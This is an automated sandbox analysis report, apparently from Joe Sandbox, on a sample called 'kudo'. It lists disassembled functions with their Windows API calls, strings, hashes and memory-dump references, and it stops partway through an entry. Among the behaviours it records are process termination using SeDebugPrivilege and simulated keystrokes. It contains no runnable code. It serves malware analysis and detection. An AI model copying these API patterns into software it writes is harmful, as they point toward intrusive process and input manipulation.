                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: d5e56f2ee51c241126b4626945f3aa0d14b93d514a83d314d2b6a6e67cff49fa
                                                      • Instruction ID: 8ed1ed3863df94eefa7d74fbe641981a6d5f7517664a8510428e42c3a8f7f065
                                                      • Opcode Fuzzy Hash: d5e56f2ee51c241126b4626945f3aa0d14b93d514a83d314d2b6a6e67cff49fa
                                                      • Instruction Fuzzy Hash: EA518170500245FEEF20FB288C89FA97BA5FB15724FA04225FA51E61E1DFB1A980CB51
                                                      Function 00802B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0083C2F7
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083C319
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0083C331
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0083C34F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0083C370
                                                      • DestroyCursor.USER32(00000000), ref: 0083C37F
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0083C39C
                                                      • DestroyCursor.USER32(?), ref: 0083C3AB
                                                        • Part of subcall function 0088A4AF: DeleteObject.GDI32(00000000), ref: 0088A4E8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2975913752-0
                                                      • Opcode ID: 4065be1e97f5fd6b1b8820cce3e4d8f3f14238eec0ff7f45b7dc6f3ca342c8ad
                                                      • Instruction ID: b771ce93ff4e3c74100d9dd96cf5670fb4d073b554f42d864cf3980a789fad97
                                                      • Opcode Fuzzy Hash: 4065be1e97f5fd6b1b8820cce3e4d8f3f14238eec0ff7f45b7dc6f3ca342c8ad
                                                      • Instruction Fuzzy Hash: DB512970610209EFDB64DF68CC59FAA7BB5FB58320F104529F946E72E0D7B0A990DB90
                                                      Function 0085966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0085A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085A84C
                                                        • Part of subcall function 0085A82C: GetCurrentThreadId.KERNEL32(00000000,?,00859683,?,00000001), ref: 0085A853
                                                        • Part of subcall function 0085A82C: AttachThreadInput.USER32(00000000,?,00859683), ref: 0085A85A
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085968E
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008596AB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008596AE
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008596B7
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008596D5
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008596D8
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008596E1
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008596F8
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008596FB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: 54e746c9a0388225e78e42b90c28a44cd57cdfd6dbd436a795aa8fe7e26eca82
                                                      • Instruction ID: 560a666a6af6d6efb5327a8a48e5cdda5256998ce49bdeb11b68c29a241c66c6
                                                      • Opcode Fuzzy Hash: 54e746c9a0388225e78e42b90c28a44cd57cdfd6dbd436a795aa8fe7e26eca82
                                                      • Instruction Fuzzy Hash: 0B11CEB1A10218BEFA106B689C89F6A3A2DFB4C752F100525F744EB0A1C9F25C10DBA4
                                                      Function 00858921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0085853C,00000B00,?,?), ref: 0085892A
                                                      • RtlAllocateHeap.NTDLL(00000000,?,0085853C), ref: 00858931
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0085853C,00000B00,?,?), ref: 00858946
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0085853C,00000B00,?,?), ref: 0085894E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 00858951
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0085853C,00000B00,?,?), ref: 00858961
                                                      • GetCurrentProcess.KERNEL32(0085853C,00000000,?,0085853C,00000B00,?,?), ref: 00858969
                                                      • DuplicateHandle.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 0085896C
                                                      • CreateThread.KERNEL32(00000000,00000000,00858992,00000000,00000000,00000000), ref: 00858986
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                      • String ID:
                                                      • API String ID: 1422014791-0
                                                      • Opcode ID: 044bba99d684d3f3ed3bb26fb1c2552249d06fdc1f6aaef271cdc4bddad81979
                                                      • Instruction ID: d7bafcd81ea3e68574c7d8842ef06bf9d5c908ab31372e89d7f910a83d806b02
                                                      • Opcode Fuzzy Hash: 044bba99d684d3f3ed3bb26fb1c2552249d06fdc1f6aaef271cdc4bddad81979
                                                      • Instruction Fuzzy Hash: E601AC75240304FFE611ABA9DC8DF677B6CFB89711F404421FB05DB191CA74A8108B20
                                                      Function 00879113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 4f5b75c55a0f537343812f83045185c08a6ae60919a4422a647fc972c1535704
                                                      • Instruction ID: bec37376e6e3795b16e76504e989bcc43928956bba14f4dcb69b93c7943d61a9
                                                      • Opcode Fuzzy Hash: 4f5b75c55a0f537343812f83045185c08a6ae60919a4422a647fc972c1535704
                                                      • Instruction Fuzzy Hash: 5C918A71A00219ABDF20DFA5C888FAEBBB8FF45714F108159F559EB289D770D944CBA0
                                                      Function 0087975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0085710A: CLSIDFromProgID.OLE32 ref: 00857127
                                                        • Part of subcall function 0085710A: ProgIDFromCLSID.OLE32(?,00000000), ref: 00857142
                                                        • Part of subcall function 0085710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857150
                                                        • Part of subcall function 0085710A: CoTaskMemFree.OLE32(00000000), ref: 00857160
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00879806
                                                      • _memset.LIBCMT ref: 00879813
                                                      • _memset.LIBCMT ref: 00879956
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00879982
                                                      • CoTaskMemFree.OLE32(?), ref: 0087998D
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 008799DB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: 4115f2a7ea5d7fcf676e4f53be889a45a443fee932c982690ffae20068a5831c
                                                      • Instruction ID: 8341f7367009b2c6d2b6e690e72dfa08e04d3a8733e819832963299f9a3c8f46
                                                      • Opcode Fuzzy Hash: 4115f2a7ea5d7fcf676e4f53be889a45a443fee932c982690ffae20068a5831c
                                                      • Instruction Fuzzy Hash: 0B91F671D00229EBDB10DFA9DC45ADEBBB9FF08310F108169E519E7291EB719A44CFA1
                                                      Function 00886D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00886E24
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00886E38
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00886E52
                                                      • _wcscat.LIBCMT ref: 00886EAD
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00886EC4
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00886EF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 202ecb9ab9681ed51818631790a656d2f118467d66ac66e9c27ff9082f02ec2e
                                                      • Instruction ID: 00d5950fbb8bfb295f71b7a87d15da12e1622a41103c975cddcd66d961af68e1
                                                      • Opcode Fuzzy Hash: 202ecb9ab9681ed51818631790a656d2f118467d66ac66e9c27ff9082f02ec2e
                                                      • Instruction Fuzzy Hash: 87419471A00348ABDF21EF68CC85BEE77A8FF08350F10056AF694D7292E6729D94CB50
                                                      Function 0087E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00863C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00863C7A
                                                        • Part of subcall function 00863C55: Process32FirstW.KERNEL32(00000000,?), ref: 00863C88
                                                        • Part of subcall function 00863C55: CloseHandle.KERNEL32(00000000), ref: 00863D52
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087E9A4
                                                      • GetLastError.KERNEL32 ref: 0087E9B7
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087E9E6
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0087EA63
                                                      • GetLastError.KERNEL32(00000000), ref: 0087EA6E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0087EAA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: f9d977896a22cc74408963a6915b6b4a5add0a6b91563ef8ddc6abb808949e66
                                                      • Instruction ID: 31780fb804d12a5b1c32d8ad4df129beb093b8b8fa72b25f90b2ea19fa0407c8
                                                      • Opcode Fuzzy Hash: f9d977896a22cc74408963a6915b6b4a5add0a6b91563ef8ddc6abb808949e66
                                                      • Instruction Fuzzy Hash: 2D4178712002009FDB11EF28CC95B69BBA5FF58314F048468FA4ADB3D2DB74E848CB96
                                                      Function 00862F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00863033
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 3b595e4bd499934d537b70ddc0f5aa2d3b666265903d9d21defbd9d2fa6511bd
                                                      • Instruction ID: b273d4f6992c65c0b9d072b92d7118346c7e3451188125b5f2f6a725a13087b6
                                                      • Opcode Fuzzy Hash: 3b595e4bd499934d537b70ddc0f5aa2d3b666265903d9d21defbd9d2fa6511bd
                                                      • Instruction Fuzzy Hash: A9112B35348B96BEE7259B58EC42CAF7B9CFF15324B21002AF900E62C2DF745F4456A6
                                                      Function 008642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00864312
                                                      • LoadStringW.USER32(00000000), ref: 00864319
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086432F
                                                      • LoadStringW.USER32(00000000), ref: 00864336
                                                      • _wprintf.LIBCMT ref: 0086435C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0086437A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00864357
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: 6e8c23adfc50d0343af94d1b70550f043971774fe1b0b7888d3fbdf89787bb03
                                                      • Instruction ID: 004cbed56e4d772cb854a97dad913f82c9c3f40a40c0a297914dd558b4c3e9fc
                                                      • Opcode Fuzzy Hash: 6e8c23adfc50d0343af94d1b70550f043971774fe1b0b7888d3fbdf89787bb03
                                                      • Instruction Fuzzy Hash: 250162F6900208BFE711E7A4DD89EFA776CFB08301F0005A1B745E6152EA745E854B71
                                                      Function 00802A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?), ref: 00802ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00802B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006), ref: 0083C21A
                                                      • ShowWindow.USER32(FFFFFFFF,?), ref: 0083C286
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: b8fbc0b8536761d03e092c316ca2ba9c55815e2e67b27ec2894a14fa4af6c285
                                                      • Instruction ID: b3a09992907e1fe02a27b385d892d99bce4bf6104fa2e3b5d2c2786a656b1fa4
                                                      • Opcode Fuzzy Hash: b8fbc0b8536761d03e092c316ca2ba9c55815e2e67b27ec2894a14fa4af6c285
                                                      • Instruction Fuzzy Hash: 234128303046949ECBB59B2C8C8CB6F7B92FB96318F24881DE147D25E1CAB5A881D761
                                                      Function 008670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 008670DD
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00867114
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00867130
                                                      • _memmove.LIBCMT ref: 0086717E
                                                      • _memmove.LIBCMT ref: 0086719B
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 008671AA
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008671BF
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 008671DE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 503ffd1659d575ed1a82b5c2dd8200d7faf8075c3bbcf1e245908b7c5119c9d3
                                                      • Instruction ID: d56a90d304cde2000fbe09e5e491a8667a2964f635a6c31d3458372f51f10933
                                                      • Opcode Fuzzy Hash: 503ffd1659d575ed1a82b5c2dd8200d7faf8075c3bbcf1e245908b7c5119c9d3
                                                      • Instruction Fuzzy Hash: 2F317E75900215EBCF00DFA8DC85AAEB7B8FF45710F1541B6E904EB246DB309E50CBA1
                                                      Function 008861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 008861EB
                                                      • GetDC.USER32(00000000), ref: 008861F3
